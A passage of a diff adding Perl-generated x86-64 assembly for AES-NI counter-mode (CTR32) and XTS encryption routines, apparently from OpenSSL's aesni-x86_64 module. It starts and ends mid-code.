+	movaps	%xmm11,-0x58(%rax)
+	movaps	%xmm12,-0x48(%rax)
+	movaps	%xmm13,-0x38(%rax)
+	movaps	%xmm14,-0x28(%rax)
+	movaps	%xmm15,-0x18(%rax)
+.Lctr32_body:
+___
+$code.=<<___;
+	lea	-8(%rax),%rbp
+
+	cmp	\$1,$len
+	je	.Lctr32_one_shortcut
+
+	movdqu	($ivp),$inout0
+	movdqu	($key),$rndkey0
+	mov	12($ivp),$ctr			# counter LSB
+	pxor	$rndkey0,$inout0
+	mov	12($key),$key0			# 0-round key LSB
+	movdqa	$inout0,0x00(%rsp)		# populate counter block
+	bswap	$ctr
+	movdqa	$inout0,$inout1
+	movdqa	$inout0,$inout2
+	movdqa	$inout0,$inout3
+	movdqa	$inout0,0x40(%rsp)
+	movdqa	$inout0,0x50(%rsp)
+	movdqa	$inout0,0x60(%rsp)
+	mov	%rdx,%r10			# borrow %rdx
+	movdqa	$inout0,0x70(%rsp)
+
+	lea	1($ctr),%rax
+	 lea	2($ctr),%rdx
+	bswap	%eax
+	 bswap	%edx
+	xor	$key0,%eax
+	 xor	$key0,%edx
+	pinsrd	\$3,%eax,$inout1
+	lea	3($ctr),%rax
+	movdqa	$inout1,0x10(%rsp)
+	 pinsrd	\$3,%edx,$inout2
+	bswap	%eax
+	 mov	%r10,%rdx			# restore %rdx
+	 lea	4($ctr),%r10
+	 movdqa	$inout2,0x20(%rsp)
+	xor	$key0,%eax
+	 bswap	%r10d
+	pinsrd	\$3,%eax,$inout3
+	 xor	$key0,%r10d
+	movdqa	$inout3,0x30(%rsp)
+	lea	5($ctr),%r9
+	 mov	%r10d,0x40+12(%rsp)
+	bswap	%r9d
+	 lea	6($ctr),%r10
+	mov	240($key),$rounds		# key->rounds
+	xor	$key0,%r9d
+	 bswap	%r10d
+	mov	%r9d,0x50+12(%rsp)
+	 xor	$key0,%r10d
+	lea	7($ctr),%r9
+	 mov	%r10d,0x60+12(%rsp)
+	bswap	%r9d
+	 mov	OPENSSL_ia32cap_P+4(%rip),%r10d 
+	xor	$key0,%r9d
+	 and	\$`1<<26|1<<22`,%r10d		# isolate XSAVE+MOVBE
+	mov	%r9d,0x70+12(%rsp)
+
+	$movkey	0x10($key),$rndkey1
+
+	movdqa	0x40(%rsp),$inout4
+	movdqa	0x50(%rsp),$inout5
+
+	cmp	\$8,$len
+	jb	.Lctr32_tail
+
+	sub	\$6,$len
+	cmp	\$`1<<22`,%r10d		# check for MOVBE without XSAVE
+	je	.Lctr32_6x
+
+	lea	0x80($key),$key		# size optimization
+	sub	\$2,$len
+	jmp	.Lctr32_loop8
+
+.align	16
+.Lctr32_6x:
+	shl	\$4,$rounds
+	mov	\$48,$rnds_
+	bswap	$key0
+	lea	32($key,$rounds),$key	# end of key schedule
+	sub	%rax,%r10		# twisted $rounds
+	jmp	.Lctr32_loop6
+
+.align	16
+.Lctr32_loop6:
+	 add	\$6,$ctr
+	$movkey	-48($key,$rnds_),$rndkey0
+	aesenc	$rndkey1,$inout0
+	 mov	$ctr,%eax
+	 xor	$key0,%eax
+	aesenc	$rndkey1,$inout1
+	 movbe	%eax,`0x00+12`(%rsp)
+	 lea	1($ctr),%eax
+	aesenc	$rndkey1,$inout2
+	 xor	$key0,%eax
+	 movbe	%eax,`0x10+12`(%rsp)
+	aesenc	$rndkey1,$inout3
+	 lea	2($ctr),%eax
+	 xor	$key0,%eax
+	aesenc	$rndkey1,$inout4
+	 movbe	%eax,`0x20+12`(%rsp)
+	 lea	3($ctr),%eax
+	aesenc	$rndkey1,$inout5
+	$movkey	-32($key,$rnds_),$rndkey1
+	 xor	$key0,%eax
+
+	aesenc	$rndkey0,$inout0
+	 movbe	%eax,`0x30+12`(%rsp)
+	 lea	4($ctr),%eax
+	aesenc	$rndkey0,$inout1
+	 xor	$key0,%eax
+	 movbe	%eax,`0x40+12`(%rsp)
+	aesenc	$rndkey0,$inout2
+	 lea	5($ctr),%eax
+	 xor	$key0,%eax
+	aesenc	$rndkey0,$inout3
+	 movbe	%eax,`0x50+12`(%rsp)
+	 mov	%r10,%rax		# mov	$rnds_,$rounds
+	aesenc	$rndkey0,$inout4
+	aesenc	$rndkey0,$inout5
+	$movkey	-16($key,$rnds_),$rndkey0
+
+	call	.Lenc_loop6
+
+	movdqu	($inp),$inout6
+	movdqu	0x10($inp),$inout7
+	movdqu	0x20($inp),$in0
+	movdqu	0x30($inp),$in1
+	movdqu	0x40($inp),$in2
+	movdqu	0x50($inp),$in3
+	lea	0x60($inp),$inp
+	$movkey	-64($key,$rnds_),$rndkey1
+	pxor	$inout0,$inout6
+	movaps	0x00(%rsp),$inout0
+	pxor	$inout1,$inout7
+	movaps	0x10(%rsp),$inout1
+	pxor	$inout2,$in0
+	movaps	0x20(%rsp),$inout2
+	pxor	$inout3,$in1
+	movaps	0x30(%rsp),$inout3
+	pxor	$inout4,$in2
+	movaps	0x40(%rsp),$inout4
+	pxor	$inout5,$in3
+	movaps	0x50(%rsp),$inout5
+	movdqu	$inout6,($out)
+	movdqu	$inout7,0x10($out)
+	movdqu	$in0,0x20($out)
+	movdqu	$in1,0x30($out)
+	movdqu	$in2,0x40($out)
+	movdqu	$in3,0x50($out)
+	lea	0x60($out),$out
+	
+	sub	\$6,$len
+	jnc	.Lctr32_loop6
+
+	add	\$6,$len
+	jz	.Lctr32_done
+
+	lea	-48($rnds_),$rounds
+	lea	-80($key,$rnds_),$key	# restore $key
+	neg	$rounds
+	shr	\$4,$rounds		# restore $rounds
+	jmp	.Lctr32_tail
+
+.align	32
+.Lctr32_loop8:
+	 add		\$8,$ctr
+	movdqa		0x60(%rsp),$inout6
+	aesenc		$rndkey1,$inout0
+	 mov		$ctr,%r9d
+	movdqa		0x70(%rsp),$inout7
+	aesenc		$rndkey1,$inout1
+	 bswap		%r9d
+	$movkey		0x20-0x80($key),$rndkey0
+	aesenc		$rndkey1,$inout2
+	 xor		$key0,%r9d
+	 nop
+	aesenc		$rndkey1,$inout3
+	 mov		%r9d,0x00+12(%rsp)
+	 lea		1($ctr),%r9
+	aesenc		$rndkey1,$inout4
+	aesenc		$rndkey1,$inout5
+	aesenc		$rndkey1,$inout6
+	aesenc		$rndkey1,$inout7
+	$movkey		0x30-0x80($key),$rndkey1
+___
+for($i=2;$i<8;$i++) {
+my $rndkeyx = ($i&1)?$rndkey1:$rndkey0;
+$code.=<<___;
+	 bswap		%r9d
+	aesenc		$rndkeyx,$inout0
+	aesenc		$rndkeyx,$inout1
+	 xor		$key0,%r9d
+	 .byte		0x66,0x90
+	aesenc		$rndkeyx,$inout2
+	aesenc		$rndkeyx,$inout3
+	 mov		%r9d,`0x10*($i-1)`+12(%rsp)
+	 lea		$i($ctr),%r9
+	aesenc		$rndkeyx,$inout4
+	aesenc		$rndkeyx,$inout5
+	aesenc		$rndkeyx,$inout6
+	aesenc		$rndkeyx,$inout7
+	$movkey		`0x20+0x10*$i`-0x80($key),$rndkeyx
+___
+}
+$code.=<<___;
+	 bswap		%r9d
+	aesenc		$rndkey0,$inout0
+	aesenc		$rndkey0,$inout1
+	aesenc		$rndkey0,$inout2
+	 xor		$key0,%r9d
+	 movdqu		0x00($inp),$in0
+	aesenc		$rndkey0,$inout3
+	 mov		%r9d,0x70+12(%rsp)
+	 cmp		\$11,$rounds
+	aesenc		$rndkey0,$inout4
+	aesenc		$rndkey0,$inout5
+	aesenc		$rndkey0,$inout6
+	aesenc		$rndkey0,$inout7
+	$movkey		0xa0-0x80($key),$rndkey0
+
+	jb		.Lctr32_enc_done
+
+	aesenc		$rndkey1,$inout0
+	aesenc		$rndkey1,$inout1
+	aesenc		$rndkey1,$inout2
+	aesenc		$rndkey1,$inout3
+	aesenc		$rndkey1,$inout4
+	aesenc		$rndkey1,$inout5
+	aesenc		$rndkey1,$inout6
+	aesenc		$rndkey1,$inout7
+	$movkey		0xb0-0x80($key),$rndkey1
+
+	aesenc		$rndkey0,$inout0
+	aesenc		$rndkey0,$inout1
+	aesenc		$rndkey0,$inout2
+	aesenc		$rndkey0,$inout3
+	aesenc		$rndkey0,$inout4
+	aesenc		$rndkey0,$inout5
+	aesenc		$rndkey0,$inout6
+	aesenc		$rndkey0,$inout7
+	$movkey		0xc0-0x80($key),$rndkey0
+	je		.Lctr32_enc_done
+
+	aesenc		$rndkey1,$inout0
+	aesenc		$rndkey1,$inout1
+	aesenc		$rndkey1,$inout2
+	aesenc		$rndkey1,$inout3
+	aesenc		$rndkey1,$inout4
+	aesenc		$rndkey1,$inout5
+	aesenc		$rndkey1,$inout6
+	aesenc		$rndkey1,$inout7
+	$movkey		0xd0-0x80($key),$rndkey1
+
+	aesenc		$rndkey0,$inout0
+	aesenc		$rndkey0,$inout1
+	aesenc		$rndkey0,$inout2
+	aesenc		$rndkey0,$inout3
+	aesenc		$rndkey0,$inout4
+	aesenc		$rndkey0,$inout5
+	aesenc		$rndkey0,$inout6
+	aesenc		$rndkey0,$inout7
+	$movkey		0xe0-0x80($key),$rndkey0
+	jmp		.Lctr32_enc_done
+
+.align	16
+.Lctr32_enc_done:
+	movdqu		0x10($inp),$in1
+	pxor		$rndkey0,$in0
+	movdqu		0x20($inp),$in2
+	pxor		$rndkey0,$in1
+	movdqu		0x30($inp),$in3
+	pxor		$rndkey0,$in2
+	movdqu		0x40($inp),$in4
+	pxor		$rndkey0,$in3
+	movdqu		0x50($inp),$in5
+	pxor		$rndkey0,$in4
+	pxor		$rndkey0,$in5
+	aesenc		$rndkey1,$inout0
+	aesenc		$rndkey1,$inout1
+	aesenc		$rndkey1,$inout2
+	aesenc		$rndkey1,$inout3
+	aesenc		$rndkey1,$inout4
+	aesenc		$rndkey1,$inout5
+	aesenc		$rndkey1,$inout6
+	aesenc		$rndkey1,$inout7
+	movdqu		0x60($inp),$rndkey1
+	lea		0x80($inp),$inp
+
+	aesenclast	$in0,$inout0
+	pxor		$rndkey0,$rndkey1
+	movdqu		0x70-0x80($inp),$in0
+	aesenclast	$in1,$inout1
+	pxor		$rndkey0,$in0
+	movdqa		0x00(%rsp),$in1		# load next counter block
+	aesenclast	$in2,$inout2
+	aesenclast	$in3,$inout3
+	movdqa		0x10(%rsp),$in2
+	movdqa		0x20(%rsp),$in3
+	aesenclast	$in4,$inout4
+	aesenclast	$in5,$inout5
+	movdqa		0x30(%rsp),$in4
+	movdqa		0x40(%rsp),$in5
+	aesenclast	$rndkey1,$inout6
+	movdqa		0x50(%rsp),$rndkey0
+	$movkey		0x10-0x80($key),$rndkey1
+	aesenclast	$in0,$inout7
+
+	movups		$inout0,($out)		# store output
+	movdqa		$in1,$inout0
+	movups		$inout1,0x10($out)
+	movdqa		$in2,$inout1
+	movups		$inout2,0x20($out)
+	movdqa		$in3,$inout2
+	movups		$inout3,0x30($out)
+	movdqa		$in4,$inout3
+	movups		$inout4,0x40($out)
+	movdqa		$in5,$inout4
+	movups		$inout5,0x50($out)
+	movdqa		$rndkey0,$inout5
+	movups		$inout6,0x60($out)
+	movups		$inout7,0x70($out)
+	lea		0x80($out),$out
+	
+	sub	\$8,$len
+	jnc	.Lctr32_loop8
+
+	add	\$8,$len
+	jz	.Lctr32_done
+	lea	-0x80($key),$key
+
+.Lctr32_tail:
+	lea	16($key),$key
+	cmp	\$4,$len
+	jb	.Lctr32_loop3
+	je	.Lctr32_loop4
+
+	shl		\$4,$rounds
+	movdqa		0x60(%rsp),$inout6
+	pxor		$inout7,$inout7
+
+	$movkey		16($key),$rndkey0
+	aesenc		$rndkey1,$inout0
+	aesenc		$rndkey1,$inout1
+	lea		32-16($key,$rounds),$key
+	neg		%rax
+	aesenc		$rndkey1,$inout2
+	add		\$16,%rax
+	 movups		($inp),$in0
+	aesenc		$rndkey1,$inout3
+	aesenc		$rndkey1,$inout4
+	 movups		0x10($inp),$in1
+	 movups		0x20($inp),$in2
+	aesenc		$rndkey1,$inout5
+	aesenc		$rndkey1,$inout6
+
+	call            .Lenc_loop8_enter
+
+	movdqu	0x30($inp),$in3
+	pxor	$in0,$inout0
+	movdqu	0x40($inp),$in0
+	pxor	$in1,$inout1
+	movdqu	$inout0,($out)
+	pxor	$in2,$inout2
+	movdqu	$inout1,0x10($out)
+	pxor	$in3,$inout3
+	movdqu	$inout2,0x20($out)
+	pxor	$in0,$inout4
+	movdqu	$inout3,0x30($out)
+	movdqu	$inout4,0x40($out)
+	cmp	\$6,$len
+	jb	.Lctr32_done
+
+	movups	0x50($inp),$in1
+	xorps	$in1,$inout5
+	movups	$inout5,0x50($out)
+	je	.Lctr32_done
+
+	movups	0x60($inp),$in2
+	xorps	$in2,$inout6
+	movups	$inout6,0x60($out)
+	jmp	.Lctr32_done
+
+.align	32
+.Lctr32_loop4:
+	aesenc		$rndkey1,$inout0
+	lea		16($key),$key
+	dec		$rounds
+	aesenc		$rndkey1,$inout1
+	aesenc		$rndkey1,$inout2
+	aesenc		$rndkey1,$inout3
+	$movkey		($key),$rndkey1
+	jnz		.Lctr32_loop4
+	aesenclast	$rndkey1,$inout0
+	aesenclast	$rndkey1,$inout1
+	 movups		($inp),$in0
+	 movups		0x10($inp),$in1
+	aesenclast	$rndkey1,$inout2
+	aesenclast	$rndkey1,$inout3
+	 movups		0x20($inp),$in2
+	 movups		0x30($inp),$in3
+
+	xorps	$in0,$inout0
+	movups	$inout0,($out)
+	xorps	$in1,$inout1
+	movups	$inout1,0x10($out)
+	pxor	$in2,$inout2
+	movdqu	$inout2,0x20($out)
+	pxor	$in3,$inout3
+	movdqu	$inout3,0x30($out)
+	jmp	.Lctr32_done
+
+.align	32
+.Lctr32_loop3:
+	aesenc		$rndkey1,$inout0
+	lea		16($key),$key
+	dec		$rounds
+	aesenc		$rndkey1,$inout1
+	aesenc		$rndkey1,$inout2
+	$movkey		($key),$rndkey1
+	jnz		.Lctr32_loop3
+	aesenclast	$rndkey1,$inout0
+	aesenclast	$rndkey1,$inout1
+	aesenclast	$rndkey1,$inout2
+
+	movups	($inp),$in0
+	xorps	$in0,$inout0
+	movups	$inout0,($out)
+	cmp	\$2,$len
+	jb	.Lctr32_done
+
+	movups	0x10($inp),$in1
+	xorps	$in1,$inout1
+	movups	$inout1,0x10($out)
+	je	.Lctr32_done
+
+	movups	0x20($inp),$in2
+	xorps	$in2,$inout2
+	movups	$inout2,0x20($out)
+	jmp	.Lctr32_done
+
+.align	16
+.Lctr32_one_shortcut:
+	movups	($ivp),$inout0
+	movups	($inp),$in0
+	mov	240($key),$rounds		# key->rounds
+___
+	&aesni_generate1("enc",$key,$rounds);
+$code.=<<___;
+	xorps	$in0,$inout0
+	movups	$inout0,($out)
+	jmp	.Lctr32_done
+
+.align	16
+.Lctr32_done:
+___
+$code.=<<___ if ($win64);
+	movaps	-0xa0(%rbp),%xmm6
+	movaps	-0x90(%rbp),%xmm7
+	movaps	-0x80(%rbp),%xmm8
+	movaps	-0x70(%rbp),%xmm9
+	movaps	-0x60(%rbp),%xmm10
+	movaps	-0x50(%rbp),%xmm11
+	movaps	-0x40(%rbp),%xmm12
+	movaps	-0x30(%rbp),%xmm13
+	movaps	-0x20(%rbp),%xmm14
+	movaps	-0x10(%rbp),%xmm15
+___
+$code.=<<___;
+	lea	(%rbp),%rsp
+	pop	%rbp
+.Lctr32_epilogue:
+	ret
+.size	aesni_ctr32_encrypt_blocks,.-aesni_ctr32_encrypt_blocks
+___
+}
+
+######################################################################
+# void aesni_xts_[en|de]crypt(const char *inp,char *out,size_t len,
+#	const AES_KEY *key1, const AES_KEY *key2
+#	const unsigned char iv[16]);
+#
+{
+my @tweak=map("%xmm$_",(10..15));
+my ($twmask,$twres,$twtmp)=("%xmm8","%xmm9",@tweak[4]);
+my ($key2,$ivp,$len_)=("%r8","%r9","%r9");
+my $frame_size = 0x70 + ($win64?160:0);
+
+$code.=<<___;
+.globl	aesni_xts_encrypt
+.type	aesni_xts_encrypt,\@function,6
+.align	16
+aesni_xts_encrypt:
+	lea	(%rsp),%rax
+	push	%rbp
+	sub	\$$frame_size,%rsp
+	and	\$-16,%rsp	# Linux kernel stack can be incorrectly seeded
+___
+$code.=<<___ if ($win64);
+	movaps	%xmm6,-0xa8(%rax)
+	movaps	%xmm7,-0x98(%rax)
+	movaps	%xmm8,-0x88(%rax)
+	movaps	%xmm9,-0x78(%rax)
+	movaps	%xmm10,-0x68(%rax)
+	movaps	%xmm11,-0x58(%rax)
+	movaps	%xmm12,-0x48(%rax)
+	movaps	%xmm13,-0x38(%rax)
+	movaps	%xmm14,-0x28(%rax)
+	movaps	%xmm15,-0x18(%rax)
+.Lxts_enc_body:
+___
+$code.=<<___;
+	lea	-8(%rax),%rbp
+	movups	($ivp),$inout0			# load clear-text tweak
+	mov	240(%r8),$rounds		# key2->rounds
+	mov	240($key),$rnds_		# key1->rounds
+___
+	# generate the tweak
+	&aesni_generate1("enc",$key2,$rounds,$inout0);
+$code.=<<___;
+	$movkey	($key),$rndkey0			# zero round key
+	mov	$key,$key_			# backup $key
+	mov	$rnds_,$rounds			# backup $rounds
+	shl	\$4,$rnds_
+	mov	$len,$len_			# backup $len
+	and	\$-16,$len
+
+	$movkey	16($key,$rnds_),$rndkey1	# last round key
+
+	movdqa	.Lxts_magic(%rip),$twmask
+	movdqa	$inout0,@tweak[5]
+	pshufd	\$0x5f,$inout0,$twres
+	pxor	$rndkey0,$rndkey1
+___
+    # alternative tweak calculation algorithm is based on suggestions
+    # by Shay Gueron. psrad doesn't conflict with AES-NI instructions
+    # and should help in the future...
+    for ($i=0;$i<4;$i++) {
+    $code.=<<___;
+	movdqa	$twres,$twtmp
+	paddd	$twres,$twres
+	movdqa	@tweak[5],@tweak[$i]
+	psrad	\$31,$twtmp			# broadcast upper bits
+	paddq	@tweak[5],@tweak[5]
+	pand	$twmask,$twtmp
+	pxor	$rndkey0,@tweak[$i]
+	pxor	$twtmp,@tweak[5]
+___
+    }
+$code.=<<___;
+	movdqa	@tweak[5],@tweak[4]
+	psrad	\$31,$twres
+	paddq	@tweak[5],@tweak[5]
+	pand	$twmask,$twres
+	pxor	$rndkey0,@tweak[4]
+	pxor	$twres,@tweak[5]
+	movaps	$rndkey1,0x60(%rsp)		# save round[0]^round[last]
+
+	sub	\$16*6,$len
+	jc	.Lxts_enc_short
+
+	mov	\$16+96,$rounds
+	lea	32($key_,$rnds_),$key		# end of key schedule
+	sub	%r10,%rax			# twisted $rounds
+	$movkey	16($key_),$rndkey1
+	mov	%rax,%r10			# backup twisted $rounds
+	lea	.Lxts_magic(%rip),%r8
+	jmp	.Lxts_enc_grandloop
+
+.align	32
+.Lxts_enc_grandloop:
+	movdqu	`16*0`($inp),$inout0		# load input
+	movdqa	$rndkey0,$twmask
+	movdqu	`16*1`($inp),$inout1
+	pxor	@tweak[0],$inout0
+	movdqu	`16*2`($inp),$inout2
+	pxor	@tweak[1],$inout1
+	 aesenc		$rndkey1,$inout0
+	movdqu	`16*3`($inp),$inout3
+	pxor	@tweak[2],$inout2
+	 aesenc		$rndkey1,$inout1
+	movdqu	`16*4`($inp),$inout4
+	pxor	@tweak[3],$inout3
+	 aesenc		$rndkey1,$inout2
+	movdqu	`16*5`($inp),$inout5
+	pxor	@tweak[5],$twmask		# round[0]^=tweak[5]
+	 movdqa	0x60(%rsp),$twres		# load round[0]^round[last]
+	pxor	@tweak[4],$inout4
+	 aesenc		$rndkey1,$inout3
+	$movkey	32($key_),$rndkey0
+	lea	`16*6`($inp),$inp
+	pxor	$twmask,$inout5
+
+	 pxor	$twres,@tweak[0]
+	aesenc		$rndkey1,$inout4
+	 pxor	$twres,@tweak[1]
+	 movdqa	@tweak[0],`16*0`(%rsp)		# put aside tweaks^last round key
+	aesenc		$rndkey1,$inout5
+	$movkey		48($key_),$rndkey1
+	 pxor	$twres,@tweak[2]
+
+	aesenc		$rndkey0,$inout0
+	 pxor	$twres,@tweak[3]
+	 movdqa	@tweak[1],`16*1`(%rsp)
+	aesenc		$rndkey0,$inout1
+	 pxor	$twres,@tweak[4]
+	 movdqa	@tweak[2],`16*2`(%rsp)
+	aesenc		$rndkey0,$inout2
+	aesenc		$rndkey0,$inout3
+	 pxor	$twres,$twmask
+	 movdqa	@tweak[4],`16*4`(%rsp)
+	aesenc		$rndkey0,$inout4
+	aesenc		$rndkey0,$inout5
+	$movkey		64($key_),$rndkey0
+	 movdqa	$twmask,`16*5`(%rsp)
+	pshufd	\$0x5f,@tweak[5],$twres
+	jmp	.Lxts_enc_loop6
+.align	32
+.Lxts_enc_loop6:
+	aesenc		$rndkey1,$inout0
+	aesenc		$rndkey1,$inout1
+	aesenc		$rndkey1,$inout2
+	aesenc		$rndkey1,$inout3
+	aesenc		$rndkey1,$inout4
+	aesenc		$rndkey1,$inout5
+	$movkey		-64($key,%rax),$rndkey1
+	add		\$32,%rax
+
+	aesenc		$rndkey0,$inout0
+	aesenc		$rndkey0,$inout1
+	aesenc		$rndkey0,$inout2
+	aesenc		$rndkey0,$inout3
+	aesenc		$rndkey0,$inout4
+	aesenc		$rndkey0,$inout5
+	$movkey		-80($key,%rax),$rndkey0
+	jnz		.Lxts_enc_loop6
+
+	movdqa	(%r8),$twmask
+	movdqa	$twres,$twtmp
+	paddd	$twres,$twres
+	 aesenc		$rndkey1,$inout0
+	paddq	@tweak[5],@tweak[5]
+	psrad	\$31,$twtmp
+	 aesenc		$rndkey1,$inout1
+	pand	$twmask,$twtmp
+	$movkey	($key_),@tweak[0]		# load round[0]
+	 aesenc		$rndkey1,$inout2
+	 aesenc		$rndkey1,$inout3
+	 aesenc		$rndkey1,$inout4
+	pxor	$twtmp,@tweak[5]
+	movaps	@tweak[0],@tweak[1]		# copy round[0]
+	 aesenc		$rndkey1,$inout5
+	 $movkey	-64($key),$rndkey1
+
+	movdqa	$twres,$twtmp
+	 aesenc		$rndkey0,$inout0
+	paddd	$twres,$twres
+	pxor	@tweak[5],@tweak[0]
+	 aesenc		$rndkey0,$inout1
+	psrad	\$31,$twtmp
+	paddq	@tweak[5],@tweak[5]
+	 aesenc		$rndkey0,$inout2
+	 aesenc		$rndkey0,$inout3
+	pand	$twmask,$twtmp
+	movaps	@tweak[1],@tweak[2]
+	 aesenc		$rndkey0,$inout4
+	pxor	$twtmp,@tweak[5]
+	movdqa	$twres,$twtmp
+	 aesenc		$rndkey0,$inout5
+	 $movkey	-48($key),$rndkey0
+
+	paddd	$twres,$twres
+	 aesenc		$rndkey1,$inout0
+	pxor	@tweak[5],@tweak[1]
+	psrad	\$31,$twtmp
+	 aesenc		$rndkey1,$inout1
+	paddq	@tweak[5],@tweak[5]
+	pand	$twmask,$twtmp
+	 aesenc		$rndkey1,$inout2
+	 aesenc		$rndkey1,$inout3
+	 movdqa	@tweak[3],`16*3`(%rsp)
+	pxor	$twtmp,@tweak[5]
+	 aesenc		$rndkey1,$inout4
+	movaps	@tweak[2],@tweak[3]
+	movdqa	$twres,$twtmp
+	 aesenc		$rndkey1,$inout5
+	 $movkey	-32($key),$rndkey1
+
+	paddd	$twres,$twres
+	 aesenc		$rndkey0,$inout0
+	pxor	@tweak[5],@tweak[2]
+	psrad	\$31,$twtmp
+	 aesenc		$rndkey0,$inout1
+	paddq	@tweak[5],@tweak[5]
+	pand	$twmask,$twtmp
+	 aesenc		$rndkey0,$inout2
+	 aesenc		$rndkey0,$inout3
+	 aesenc		$rndkey0,$inout4
+	pxor	$twtmp,@tweak[5]
+	movaps	@tweak[3],@tweak[4]
+	 aesenc		$rndkey0,$inout5
+
+	movdqa	$twres,$rndkey0
+	paddd	$twres,$twres
+	 aesenc		$rndkey1,$inout0
+	pxor	@tweak[5],@tweak[3]
+	psrad	\$31,$rndkey0
+	 aesenc		$rndkey1,$inout1
+	paddq	@tweak[5],@tweak[5]
+	pand	$twmask,$rndkey0
+	 aesenc		$rndkey1,$inout2
+	 aesenc		$rndkey1,$inout3
+	pxor	$rndkey0,@tweak[5]
+	$movkey		($key_),$rndkey0
+	 aesenc		$rndkey1,$inout4
+	 aesenc		$rndkey1,$inout5
+	$movkey		16($key_),$rndkey1
+
+	pxor	@tweak[5],@tweak[4]
+	 aesenclast	`16*0`(%rsp),$inout0
+	psrad	\$31,$twres
+	paddq	@tweak[5],@tweak[5]
+	 aesenclast	`16*1`(%rsp),$inout1
+	 aesenclast	`16*2`(%rsp),$inout2
+	pand	$twmask,$twres
+	mov	%r10,%rax			# restore $rounds
+	 aesenclast	`16*3`(%rsp),$inout3
+	 aesenclast	`16*4`(%rsp),$inout4
+	 aesenclast	`16*5`(%rsp),$inout5
+	pxor	$twres,@tweak[5]
+
+	lea	`16*6`($out),$out
+	movups	$inout0,`-16*6`($out)		# write output
+	movups	$inout1,`-16*5`($out)
+	movups	$inout2,`-16*4`($out)
+	movups	$inout3,`-16*3`($out)
+	movups	$inout4,`-16*2`($out)
+	movups	$inout5,`-16*1`($out)
+	sub	\$16*6,$len
+	jnc	.Lxts_enc_grandloop
+
+	mov	\$16+96,$rounds
+	sub	$rnds_,$rounds
+	mov	$key_,$key			# restore $key
+	shr	\$4,$rounds			# restore original value
+
+.Lxts_enc_short:
+	mov	$rounds,$rnds_			# backup $rounds
+	pxor	$rndkey0,@tweak[0]
+	add	\$16*6,$len
+	jz	.Lxts_enc_done
+
+	pxor	$rndkey0,@tweak[1]
+	cmp	\$0x20,$len
+	jb	.Lxts_enc_one
+	pxor	$rndkey0,@tweak[2]
+	je	.Lxts_enc_two
+
+	pxor	$rndkey0,@tweak[3]
+	cmp	\$0x40,$len
+	jb	.Lxts_enc_three
+	pxor	$rndkey0,@tweak[4]
+	je	.Lxts_enc_four
+
+	movdqu	($inp),$inout0
+	movdqu	16*1($inp),$inout1
+	movdqu	16*2($inp),$inout2
+	pxor	@tweak[0],$inout0
+	movdqu	16*3($inp),$inout3
+	pxor	@tweak[1],$inout1
+	movdqu	16*4($inp),$inout4
+	lea	16*5($inp),$inp
+	pxor	@tweak[2],$inout2
+	pxor	@tweak[3],$inout3
+	pxor	@tweak[4],$inout4
+
+	call	_aesni_encrypt6
+
+	xorps	@tweak[0],$inout0
+	movdqa	@tweak[5],@tweak[0]
+	xorps	@tweak[1],$inout1
+	xorps	@tweak[2],$inout2
+	movdqu	$inout0,($out)
+	xorps	@tweak[3],$inout3
+	movdqu	$inout1,16*1($out)
+	xorps	@tweak[4],$inout4
+	movdqu	$inout2,16*2($out)
+	movdqu	$inout3,16*3($out)
+	movdqu	$inout4,16*4($out)
+	lea	16*5($out),$out
+	jmp	.Lxts_enc_done
+
+.align	16
+.Lxts_enc_one:
+	movups	($inp),$inout0
+	lea	16*1($inp),$inp
+	xorps	@tweak[0],$inout0
+___
+	&aesni_generate1("enc",$key,$rounds);
+$code.=<<___;
+	xorps	@tweak[0],$inout0
+	movdqa	@tweak[1],@tweak[0]
+	movups	$inout0,($out)
+	lea	16*1($out),$out
+	jmp	.Lxts_enc_done
+
+.align	16
+.Lxts_enc_two:
+	movups	($inp),$inout0
+	movups	16($inp),$inout1
+	lea	32($inp),$inp
+	xorps	@tweak[0],$inout0
+	xorps	@tweak[1],$inout1
+
+	call	_aesni_encrypt2
+
+	xorps	@tweak[0],$inout0
+	movdqa	@tweak[2],@tweak[0]
+	xorps	@tweak[1],$inout1
+	movups	$inout0,($out)
+	movups	$inout1,16*1($out)
+	lea	16*2($out),$out
+	jmp	.Lxts_enc_done
+
+.align	16
+.Lxts_enc_three:
+	movups	($inp),$inout0
+	movups	16*1($inp),$inout1
+	movups	16*2($inp),$inout2
+	lea	16*3($inp),$inp
+	xorps	@tweak[0],$inout0
+	xorps	@tweak[1],$inout1
+	xorps	@tweak[2],$inout2
+
+	call	_aesni_encrypt3
+
+	xorps	@tweak[0],$inout0
+	movdqa	@tweak[3],@tweak[0]
+	xorps	@tweak[1],$inout1
+	xorps	@tweak[2],$inout2
+	movups	$inout0,($out)
+	movups	$inout1,16*1($out)
+	movups	$inout2,16*2($out)
+	lea	16*3($out),$out
+	jmp	.Lxts_enc_done
+
+.align	16
+.Lxts_enc_four:
+	movups	($inp),$inout0
+	movups	16*1($inp),$inout1
+	movups	16*2($inp),$inout2
+	xorps	@tweak[0],$inout0
+	movups	16*3($inp),$inout3
+	lea	16*4($inp),$inp
+	xorps	@tweak[1],$inout1
+	xorps	@tweak[2],$inout2
+	xorps	@tweak[3],$inout3
+
+	call	_aesni_encrypt4
+
+	pxor	@tweak[0],$inout0
+	movdqa	@tweak[4],@tweak[0]
+	pxor	@tweak[1],$inout1
+	pxor	@tweak[2],$inout2
+	movdqu	$inout0,($out)
+	pxor	@tweak[3],$inout3
+	movdqu	$inout1,16*1($out)
+	movdqu	$inout2,16*2($out)
+	movdqu	$inout3,16*3($out)
+	lea	16*4($out),$out
+	jmp	.Lxts_enc_done
+
+.align	16
+.Lxts_enc_done:
+	and	\$15,$len_
+	jz	.Lxts_enc_ret
+	mov	$len_,$len
+
+.Lxts_enc_steal:
+	movzb	($inp),%eax			# borrow $rounds ...
+	movzb	-16($out),%ecx			# ... and $key
+	lea	1($inp),$inp
+	mov	%al,-16($out)
+	mov	%cl,0($out)
+	lea	1($out),$out
+	sub	\$1,$len
+	jnz	.Lxts_enc_steal
+
+	sub	$len_,$out			# rewind $out
+	mov	$key_,$key			# restore $key
+	mov	$rnds_,$rounds			# restore $rounds
+
+	movups	-16($out),$inout0
+	xorps	@tweak[0],$inout0
+___
+	&aesni_generate1("enc",$key,$rounds);
+$code.=<<___;
+	xorps	@tweak[0],$inout0
+	movups	$inout0,-16($out)
+
+.Lxts_enc_ret:
+___
+$code.=<<___ if ($win64);
+	movaps	-0xa0(%rbp),%xmm6
+	movaps	-0x90(%rbp),%xmm7
+	movaps	-0x80(%rbp),%xmm8
+	movaps	-0x70(%rbp),%xmm9
+	movaps	-0x60(%rbp),%xmm10
